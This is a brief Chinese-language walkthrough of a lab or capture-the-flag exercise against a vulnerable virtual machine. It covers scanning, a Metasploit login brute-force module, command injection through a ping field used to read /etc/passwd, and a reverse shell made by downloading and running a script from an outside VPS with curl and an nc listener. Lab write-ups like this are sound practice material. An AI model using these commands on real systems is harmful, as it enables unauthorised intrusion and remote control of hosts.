1.修改网络连接模式为桥接并通过VirtualBox来打开靶机kali作为攻击者并扫描主机IP地址 2.端口扫描 3.访问主页80端口 4.点击troubleshoot会弹出一个登录框 5.dirb扫描目录 6.发现没有有用信息 通过msf进行登录爆破 use auxiliary/scanner/http/http_login show options # 获知密码的字典位置,把“Security@hackNos”加入到密码字典中 set AUTH_URI /5ecure/ set STOP_ON_SUCCESS true set RHOSTS 192.168.1.93 exploit 7.登录 8.跳转到了这个页面发现上边写的ping像是rce漏洞抓包分析 9.读取到了/etc/passwd文件 10.反弹shell在vps上编辑一个sh文件1.sh 11.启动临时web服务并设置监听8888端口 python3 -m http.server 8000 nc -lvvp 8888 12.远程下载 curl http://47.121.133.57:8000/1.sh -o 1.sh chmod +x 1.sh /bin/bash 1.sh 13.成功反弹